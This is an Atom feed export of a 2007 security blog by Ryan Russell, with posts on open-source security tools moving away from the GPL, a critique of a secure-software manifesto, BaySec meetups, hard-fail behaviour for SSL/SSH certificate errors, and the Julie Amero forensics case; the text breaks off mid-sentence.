I can only judge based on their actions and published licenses.&lt;br /&gt;&lt;br /&gt;But it sure looks like they're taking the combination of their own work and the community support, and selling it for a profit.&lt;br /&gt;&lt;br /&gt;Why do I care? Because I believe that a lot of people, myself included, gave support because they thought they were helping out a project that was &lt;span style="font-weight: bold; font-style: italic;"&gt;only&lt;/span&gt; under a GPL license. Changing it after the fact strikes me as a kind of dishonesty. If you help out a commercial software company, great. You knew what you were helping. I know a lot of people who do free QA for Microsoft.&lt;br /&gt;&lt;br /&gt;But if you think you're contributing to a project because your help will always be available to the world, and you'll find it in your favorite latest Linux distro, sorry. Nessus is all the way there, no new Nessus for anyone who doesn't want to register, download and install it themselves, and so on. And no source. Snort and nmap can still be shipped around, but we'll see if it stays that way. No more free Snort sig feeds for you though, if I recall correctly.&lt;br /&gt;&lt;br /&gt;I should clarify a point. I keep talking like these projects aren't GPL anymore. That's because I don't think they are, at least not entirely. Nessus clearly isn't anymore. No question there. How about Snort and nmap which have commercial versions available for licensing?&lt;br /&gt;&lt;br /&gt;Marty asks in the Matasano blog comments next to me "Snort isn't GPL?"&lt;br /&gt;&lt;br /&gt;No.&lt;br /&gt;&lt;br /&gt;So you can take Snort and code on it or mix it with other code, and your users can demand the source from you under the GPL terms. That seems pretty GPL, right? So what if your code is in Snort, and SourceFire sells a license to a commercial software vendor. 
Can you make that vendor give you a copy of their source?&lt;br /&gt;&lt;br /&gt;Nope.&lt;br /&gt;&lt;br /&gt;Anyone remember the point of the GPL? It's so that no one can take your code away from you.&lt;br /&gt;&lt;br /&gt;So you might be wondering, how can they take your GPL code and sell it under another license? Am I accusing these projects of stealing code? No, not really. I assume that they have acquired the rights to all the bits of code or have purged the stuff they can't track down.&lt;br /&gt;&lt;br /&gt;Yes, this does mean they had to have planned this for a while. They had to stop taking contributions from all the outsiders or people who will only submit GPL code. I believe these guys are smart enough to get this right, though I wouldn't mind seeing how they went about auditing the codebase.&lt;br /&gt;&lt;br /&gt;Does this mean they can never take outside code again? Well, it means the submitter has to be willing to give them a license to do whatever they want with it, including selling it non-GPL'd. This would include, say, people working on it for the Google Summer of Code.&lt;br /&gt;&lt;br /&gt;SourceFire has that part tied up rather neatly, too. If you read Marty's "clarifications", you'll see that if you get your code near any SourceFire people, then you automagically grant them the right to sell it as closed-source.&lt;br /&gt;&lt;br /&gt;So no, not GPL.&lt;br /&gt;&lt;br /&gt;Another interesting thing about the GPL, it only covers code and maybe some docs. If you made some other kind of contribution like the ones I mentioned earlier, not covered. They can just take it and sell it.&lt;br /&gt;&lt;br /&gt;So who is really killing GPL'd projects? If you think StillSecure is stealing without giving back, I'm not seeing how SourceFire isn't doing some of the same.&lt;br /&gt;&lt;br /&gt;I've met Fyodor and a bunch of the SourceFire guys a number of times. 
I don't have anything against them personally, and it's not like I don't wish them financial success. I just wish they had either had the license they really wanted in the first place, or didn't go changing it late in the game.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-6271764955438650072?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/6271764955438650072/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=6271764955438650072' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6271764955438650072'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/6271764955438650072'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/06/open-source-remorse.html' title='Open Source Remorse'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-7568415226506169014</id><published>2007-06-02T14:32:00.000-07:00</published><updated>2007-06-02T15:30:49.397-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>That's your manifesto?</title><content type='html'>Pete Lindstrom posts his &lt;a href="http://spiresecurity.typepad.com/spire_security_viewpoint/2007/05/secure_software.html"&gt;Secure Software Manifesto&lt;/a&gt;. Pete, you'll have to do better than that. 
I guess a manifesto is not a thesis; it's not intended to be a self-contained set of assertions and evidence. But I feel it necessary to call out what look like some glaring factual errors and inconsistencies to me.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;1. Public vulnerability information (e.g. CVE, disclosure info, etc.) provides data about the activities of the hacker/bugfinder/security researcher community; it tells us nothing about the absolute or relative level of vulnerability of software.&lt;/blockquote&gt;On the contrary, I think the effort required to find bugs, and the rate and volume at which they are discovered, are the best indicators of the relative level of security of a software package. I will agree that this doesn't tell us the absolute number of vulnerabilities left. There's always the chance that the researchers found the absolutely last bug in a package on the 31st while doing their Month of x Bugs.&lt;br /&gt;&lt;br /&gt;The past is not necessarily a predictor of the future, but the past may be a predictor of the more recent past. Or you might prefer correlator. I believe the data is all there for someone who wants to, say, take the bugs for packages from 2005 and see how they correlated with bugs in 2006. At least for known bugs.&lt;br /&gt;&lt;blockquote&gt;2. The defining aspect of a software program's vulnerable state is the number of vulnerabilities (known or unknown) that exist in the software. It is &lt;em&gt;not&lt;/em&gt; how hard programmers try not to program vulnerabilities nor how hard others try to find the vulnerabilities.&lt;br /&gt;&lt;/blockquote&gt;The first sentence is a fine definition. The second sentence seems to be trying to distance itself from the first, though. If you try hard to create fewer vulnerabilities (and have some talent and experience in that), don't you think you will create fewer vulnerabilities? 
And if you missed some, and others find them and you fix them, don't you mostly end up with fewer vulnerabilities?&lt;br /&gt;&lt;br /&gt;So no, using the definition of "vulnerable" to mean there is at least one vulnerability left, there's probably no amount of effort you can expend that is going to get that count to zero. But don't we want software packages that have fewer vulnerabilities, if you can't have zero?&lt;br /&gt;&lt;br /&gt;Because if there's no value to that, I know lots of people who could be doing something else with their time.&lt;br /&gt;&lt;blockquote&gt;3. The contribution of a patch to the vulnerable state of a software program is a tradeoff between the specific vulnerability (or set of vulnerabilities) it fixes and the potential new vulnerabilities it introduces.&lt;/blockquote&gt;Sure. Do you mean to imply that patches often introduce new problems? I'm kinda under the impression that's relatively uncommon, but I'd be willing to be proven wrong.&lt;br /&gt;&lt;blockquote&gt;4. There is currently no known measurement that determines or predicts the vulnerable state of a software program.&lt;br /&gt;&lt;/blockquote&gt;False. If you use the definition of "vulnerable" meaning that there is at least one vulnerability, then I have a program that will read any other program of some minimum complexity, and return the probability that it is vulnerable. The answer is usually 1. I'm very confident in my low false-positive rate.&lt;br /&gt;&lt;br /&gt;Facetiousness aside, I agree that there is no metric or program to find or even count all of the vulnerabilities in a program. Maybe not even most of them.&lt;br /&gt;&lt;br /&gt;But there are programs, services and consulting that will find "some". Is there value in finding "some"? Is it useful to know how hard it was to find "some"?&lt;br /&gt;&lt;blockquote&gt;5. 
We don't know how many "undercover" vulnerabilities are possessed and/or in use by the bad guys, therefore we must develop solutions that don't rely on known vulnerabilities for protection.&lt;br /&gt;&lt;/blockquote&gt;Once again, I agree with your opening statement, and am left wondering where you got that particular conclusion. Why not "therefore we must find and fix as many vulnerabilities as possible" or "therefore we must infiltrate the underground and gather intelligence"?&lt;br /&gt;&lt;blockquote&gt;6. The single best thing any developer can do today to assist in protecting a software program is to systematically, comprehensively describe how the software is intended to operate in machine (and preferably human) readable language.&lt;br /&gt;&lt;/blockquote&gt;As a QA guy, I'd have to say that would be really, really awesome. Yes, can I have that please? But if I had that, isn't that the same as programmers trying hard, a la your point 2?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-7568415226506169014?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/7568415226506169014/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=7568415226506169014' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7568415226506169014'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7568415226506169014'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/06/thats-your-manifesto.html' title='That&apos;s your manifesto?'/><author><name>Ryan 
Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5914978912211782896</id><published>2007-05-16T10:51:00.000-07:00</published><updated>2007-05-16T10:56:01.610-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>BaySec 1 Tonight!</title><content type='html'>&lt;a href="http://www.sockpuppet.org/baysec/"&gt;BaySec&lt;/a&gt; is this evening. Hope to see you there!&lt;br /&gt;&lt;br /&gt;Also, there is now a &lt;a href="http://citysec.org/"&gt;CitySec&lt;/a&gt; site for organizing these things. I know it's unlikely that you're aware of or care about the city meetups and are not reading the &lt;a href="http://www.matasano.com/log/"&gt;Matasano blog&lt;/a&gt; and don't know this already. 
But for completeness' sake, and search engines and so on.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5914978912211782896?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5914978912211782896/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5914978912211782896' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5914978912211782896'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5914978912211782896'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/05/baysec-1-tonight.html' title='BaySec 1 Tonight!'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5584239720665282737</id><published>2007-05-05T14:02:00.000-07:00</published><updated>2007-05-05T14:21:18.105-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>BaySec!</title><content type='html'>The first San Francisco-area &lt;a href="http://www.matasano.com/log/category/gatherings/"&gt;Matasano-inspired&lt;/a&gt; BaySec get-together is Wednesday, May 16, 2007, 7:00 PM at &lt;a href="http://zeitgeist.citysearch.com/"&gt;Zeitgeist&lt;/a&gt;. 
They tell me they don't do reservations, and the best thing is to show up early and stake out your seats. Sounds like an invitation to take over the place to me.&lt;br /&gt;&lt;br /&gt;Likely attendees (aka those of us who have been conspiring to get BaySec started) are &lt;a href="http://raffy.ch/blog/2007/05/02/baysec-meeting-on-may-16th-2007/"&gt;Raffael Marty&lt;/a&gt;, &lt;a href="http://chuvakin.blogspot.com/"&gt;Anton Chuvakin&lt;/a&gt;, &lt;a href="http://rdist.root.org/2007/05/01/baysec-meetup-on-may-16/"&gt;Nate Lawson&lt;/a&gt;, and more importantly, you.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There's a mailing list, courtesy of &lt;a href="http://www.matasano.com/log/"&gt;Tom Ptacek&lt;/a&gt;:&lt;br /&gt;baysec at sockpuppet dot org&lt;br /&gt;baysec-subscribe at sockpuppet dot org&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hope to see you there, and please spread the word.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5584239720665282737?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5584239720665282737/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5584239720665282737' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5584239720665282737'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5584239720665282737'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/05/baysec.html' title='BaySec!'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-1820295152359644988</id><published>2007-04-03T21:56:00.000-07:00</published><updated>2007-04-03T23:00:23.963-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Why SSL sucks</title><content type='html'>Recent posts about security protocols like &lt;a href="http://www.matasano.com/log/745/lindstrom-on-ssl/"&gt;SSL&lt;/a&gt; and &lt;a href="http://www.matasano.com/log/756/a-case-against-dnssec-count-1-solves-a-non-problem/"&gt;DNSSEC&lt;/a&gt; got me thinking. In an orthogonal direction.&lt;br /&gt;&lt;br /&gt;You know what's wrong with protocols like SSL, SSH and PGP/GPG? They let users pick the stupid. Bruce Schneier has trained me to call this the "dancing pigs" problem, though I'm too lazy to go look up the guy Bruce says he got it from.&lt;br /&gt;&lt;br /&gt;It goes like this: "There's a problem with the security gizmo; click OK to see the dancing pigs."&lt;br /&gt;&lt;br /&gt;Unless you're a security researcher who lives for the chance to investigate a malicious server, you just click OK to see the dancing pigs.&lt;br /&gt;&lt;br /&gt;All my kids have been computer users since before they could read. They don't know what the dialog says, but they learn to click OK to see the dancing pigs. Even when they do learn how to read, they aren't necessarily so concerned with expired certificates or DNS name mismatches.&lt;br /&gt;&lt;br /&gt;The reason these protocols all suck is because they let just anybody make the security policy decisions. 
Stupid.&lt;br /&gt;&lt;br /&gt;(OK, so it's not the protocols/file formats themselves, just every app that implements them.)&lt;br /&gt;&lt;br /&gt;So, what am I suggesting instead?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.doxpara.com/"&gt;Dan Kaminsky&lt;/a&gt; wrote an excellent chapter on spoofing for me, for the first edition of Hack Proofing your Network. I hope to have it available for download one of these days. In it, he makes a perfect case for reliability == security. If your service is going down all the time, then you are being trained to live with unreliability and ignore strange problems. Your judgment is shot.&lt;br /&gt;&lt;br /&gt;So much for the idea that a &lt;a href="http://www.matasano.com/log/725/when-did-denial-of-service-attacks-stop-being-vulnerabilities/"&gt;DoS&lt;/a&gt; isn't a security problem.&lt;br /&gt;&lt;br /&gt;As a QA guy, I really want bugs to crash, and crash hard. Crash dump or core file too, please. The alternative is random behavior, unreproducible issues, caught exceptions that I really needed to know about, and maybe memory scribbling that could exhibit random symptoms. You don't want it to be kinda tolerable, not that big of a deal, I haven't seen it in a while I guess it's gone kind of a problem.&lt;br /&gt;&lt;br /&gt;So security protocols need to break and break hard.&lt;br /&gt;&lt;br /&gt;If there's a problem with the certificate, then just drop the connection. Don't prompt the user. Don't try to rate how bad of a problem it is. Don't toss a yield sign in the corner, don't show me a key with fewer teeth. Just stop.&lt;br /&gt;&lt;br /&gt;If the SSH server keys have changed, don't connect. Don't offer to connect anyway. Don't ask if I want to save over my keys. Don't tell me the command-line switch to disable my security.&lt;br /&gt;&lt;br /&gt;If the GPG email signature doesn't verify, don't let me read it anyway. 
Don't invite me to keep searching keyservers until I happen to find one with keys that agree.&lt;br /&gt;&lt;br /&gt;Why? Because if it breaks properly, people will be forced to get someone competent to fix it. And they will HAVE to fix it.&lt;br /&gt;&lt;br /&gt;Examples. If someone's SSL cert expires, right now they can sort of ignore it for a little while, or tell people to click OK, and so on. Do it my way, and it breaks entirely, and the person who should have renewed the cert does so, right now. Don't get me started on self-signed certs. If you've done something and blown away your server SSH keys, you think no big deal, just tell everyone to accept the new ones. Do this enough, and what have you trained users to do? If instead SSH doesn't work at all, how much more careful would you be about bothering to restore the original SSH keys?&lt;br /&gt;&lt;br /&gt;But this is painful for people? That's the point. People learn through pain. Some things should be punished. Some events should be disruptive.&lt;br /&gt;&lt;br /&gt;People should be trained to take security seriously.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-1820295152359644988?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/1820295152359644988/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=1820295152359644988' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1820295152359644988'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1820295152359644988'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/04/why-ssl-sucks.html' title='Why SSL 
sucks'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-922831596693243380</id><published>2007-03-27T00:34:00.000-07:00</published><updated>2007-03-27T00:52:24.377-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='stories'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>I'm glad you got your kid back</title><content type='html'>Erik takes his kids to Disneyland, but manages to lose the 3-year-old. But that's OK, he had hung a USB flash drive around the kid's neck, and had him back within &lt;a href="http://www.dailycupoftech.com/2007/03/22/dcot-helps-find-lost-child/"&gt;13 minutes&lt;/a&gt;.&lt;br /&gt;&lt;blockquote&gt;Our three year old did just what we thought he would do - Disappeared. Within 13 minutes of being ‘lost’ though, my cellphone rang.&lt;/blockquote&gt;The little scamp.&lt;br /&gt;&lt;br /&gt;Anyway, I actually am glad he got his kid back so quickly. Nothing is worse than having your young child go missing. But...&lt;br /&gt;&lt;br /&gt;So the father planned ahead, that's good. If you'd like to do the same yourself, I see that SurplusComputers has a &lt;a href="http://www.surpluscomputers.com/store/main.aspx?p=ItemDetail&amp;amp;item=DRV10954"&gt;2-pack&lt;/a&gt; of similar-sounding drives for about $8.&lt;br /&gt;&lt;br /&gt;But I can't say I recommend you do that. Instead, I recommend that you plant the equivalent of a dog tag on your kid. 
It's no worse than the USB version, and you're much more likely to get someone with a cell phone and no computer handy to just read the tag and call you.&lt;br /&gt;&lt;br /&gt;Heck, if you know you're probably going to lose your kid at Disneyland, I bet you could get them back in just 5 minutes with the dog tag.&lt;br /&gt;&lt;br /&gt;Oh, and I see the &lt;a href="http://www.dailycupoftech.com/have-your-lost-usb-drive-ask-for-help/"&gt;lost USB drive&lt;/a&gt; thing just relies on Autorun to pop up the message. Disneyland Security, you just got pwned by a 3-year-old. Pentesters, are you paying attention?&lt;br /&gt;&lt;br /&gt;Found via &lt;a href="http://www.thedisneyblog.com/tdb/2007/03/disney_hack_fin.html"&gt;The Disney Blog&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-922831596693243380?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/922831596693243380/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=922831596693243380' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/922831596693243380'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/922831596693243380'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/03/im-glad-you-got-your-kid-back.html' title='I&apos;m glad you got your kid back'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-8411606421516614123</id><published>2007-03-24T00:35:00.000-07:00</published><updated>2007-03-24T00:45:34.273-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Owning up</title><content type='html'>If you're a software vendor and a researcher comes along and claims there's a problem with one of your offerings, and you (the vendor) think there is not, you issue a public statement to the contrary. That's fair.&lt;br /&gt;&lt;br /&gt;However, if the researcher persists and manages to prove his or her case to you, what do you do?&lt;br /&gt;&lt;br /&gt;If you're Microsoft, you own up to the problem, and thank the researcher for making you understand.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stepto.com/Lists/Posts/Post.aspx?ID=315"&gt;Exhibit 1&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.majornelson.com/archive/2007/03/23/xbox-live-security-update.aspx"&gt;Exhibit 2&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;That sure looks like the right way to do things to me. 
At least, the drama will probably only last about a week.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-8411606421516614123?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/8411606421516614123/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=8411606421516614123' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8411606421516614123'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8411606421516614123'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/03/owning-up.html' title='Owning up'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-7808454015627363494</id><published>2007-03-12T22:23:00.000-07:00</published><updated>2007-03-12T22:26:19.340-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='RE'/><category scheme='http://www.blogger.com/atom/ns#' term='spare brain'/><title type='text'>FPO</title><content type='html'>Great short blog entry by Larry Osterman about &lt;a href="http://blogs.msdn.com/larryosterman/archive/2007/03/12/fpo.aspx"&gt;FPO&lt;/a&gt;. 
I certainly have seen any number of functions that work both ways, but I never knew it had a name, and I hadn't picked up the implication for debugger stack traces.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-7808454015627363494?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/7808454015627363494/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=7808454015627363494' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7808454015627363494'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7808454015627363494'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/03/fpo.html' title='FPO'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5148307371891867055</id><published>2007-03-08T10:32:00.000-08:00</published><updated>2007-03-08T10:44:18.328-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='work'/><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>Official shilling</title><content type='html'>My employer BigFix has launched a &lt;a href="http://bigblog.typepad.com/"&gt;company blog&lt;/a&gt;. 
I have written my &lt;a href="http://bigblog.typepad.com/bigfix_the_relay/2007/03/unified_agent.html"&gt;first entry&lt;/a&gt; responding to a post on Ross Brown's blog.&lt;br /&gt;&lt;br /&gt;Anything that's strictly a BigFix topic, I'll probably do over there from now on. Though, if I think I've been especially clever or something I may drop a pointer here as well. I can think of at least one thing coming up in the future that will be posted over there that I will probably want to share. It's a follow-up of sorts to my previous &lt;a href="http://ryanlrussell.blogspot.com/2007/02/im-in-ur-package-playing-with-ur.html"&gt;Rubik-related&lt;/a&gt; post.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5148307371891867055?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5148307371891867055/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5148307371891867055' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5148307371891867055'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5148307371891867055'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/03/official-shilling.html' title='Official shilling'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-9154095379830287501</id><published>2007-02-22T15:59:00.000-08:00</published><updated>2007-02-22T16:49:39.101-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Julie Amero add'l</title><content type='html'>Brian Livingston gave me permission to write my Windows Secrets &lt;a href="http://windowssecrets.com/comp/070222#story0"&gt;article&lt;/a&gt; this time about &lt;a href="http://julieamer.blogspot.com/"&gt;Julie Amero&lt;/a&gt;. I'm grateful that he allowed me to use my space there (which is a paid gig for me) to help spread the word. Brian is sympathetic to her situation as well, and you may have seen him quoted in the New York Times &lt;a href="http://www.nytimes.com/2007/02/14/nyregion/14teacher.html?ei=5090&amp;en=9e18a05a5f2e2de3&amp;amp;ex=1329109200&amp;adxnnl=1&amp;amp;partner=rssuserland&amp;emc=rss&amp;amp;adxnnlx=1171481393-PZ2abm9Sp2napgnyEloHcg"&gt;story&lt;/a&gt; about it. In addition, he made it the Top Story, which means that it goes to ALL subscribers, not just paid subscribers. It also means I can link to it from anywhere, like I just did.&lt;br /&gt;&lt;br /&gt;If you don't know about Julie's situation, you can read my article, and there are some links in it to others that give more background. If you read security blogs at all, you probably already know all this, so I won't cover it here. The reason I haven't mentioned it before is because I was preparing that article, and because I have been working behind the scenes with others, as hinted at in the article.&lt;br /&gt;&lt;br /&gt;I can be long-winded, so my article was over twice the length it was supposed to be, and had to be cut down a bit for the newsletter. 
I wanted to use the extra material here, and make an update or two.&lt;br /&gt;&lt;br /&gt;In the ComputerCOP Pro section, I originally had this:&lt;br /&gt;&lt;br /&gt;So what did the detective use to examine the "image"? He used a program called Computer COP Pro. Here's an example entry from the &lt;a href="http://www.computercop.com/faqprof.html"&gt;FAQ&lt;/a&gt;:&lt;br /&gt;&lt;blockquote&gt;Q. Does Professional require training to use?&lt;br /&gt;&lt;br /&gt;A. For a competent computer user, Professional truly does not need training to use as the detailed search applications are performed automatically by the software and the product does come with a Getting Started manual. However, because you may need to testify in court or in a hearing, it would be best to receive the company's training and certification.&lt;/blockquote&gt;So, training would be nice, but you can get away with not doing it if it's inconvenient. I'm told that training consists of an hour on the phone.&lt;br /&gt;&lt;br /&gt;Needless to say, this program really doesn't sound like it would meet my standards for a forensics 